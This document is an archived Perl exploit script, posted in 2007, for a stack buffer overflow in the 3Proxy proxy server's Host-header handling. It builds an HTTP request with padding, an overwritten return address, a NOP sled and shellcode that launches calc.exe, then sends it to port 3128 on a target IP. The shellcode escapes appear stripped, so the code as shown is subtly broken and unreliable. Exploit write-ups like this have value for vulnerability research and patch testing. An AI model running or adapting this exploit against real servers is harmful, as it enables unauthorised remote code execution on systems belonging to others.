3proxylogurl-overflow.txt
Posted on 20 December 2007
#!/usr/bin/perl #This module exploits a stack overflow in 3Proxy prior to 0.5.3h, and 0.6b-devel before 20070413. By sending a long host header in HTTP GET request to the default port of # 3128, a remote attacker could overflow a buffer and execute arbitrary code. # # Marcin Kozlowski based on vade79 PoC # #IO::Socket for network connections use IO::Socket; #the ip address is our first commandline argument also known as ARGV[0] in Perl $ip = $ARGV[0]; #our nopsled $nopsled = "x90"x36; $A = "A" x 1064; $B = "B" x 999; #execute calc.exe # $payload = "x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02". "xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48". "x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4". "xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12". "x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69". "x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6". "x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5". "x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21". "x61xddx0ex4d"; #our extended instruction pointer which we use to overwrite the remote eip #remeber to make it little-endian format $eip = "x72x93xabx71"; #call esp #we construct our full attackstring here $attackstring = "GET /".$A.$eip.$nopsled.$payload." HTTP/1.0 Host: ".$B." "; print $attackstring; #view a message if no ip address is given if(!$ip) { die "You have to provide the target's IP Address.. "; } #the remote port to connect to $port = '3128'; #the connection protocol to use $protocol = 'tcp'; #create the actual network connection #and print an error message if it's not possible to create a socket $socket = IO::Socket::INET->new(PeerAddr=>$ip, PeerPort=>$port, Proto=>$protocol, Timeout=>'1') || die "Could not create socket "; #send the payload to the remote computer print $socket $attackstring; #close the connection close($socket);
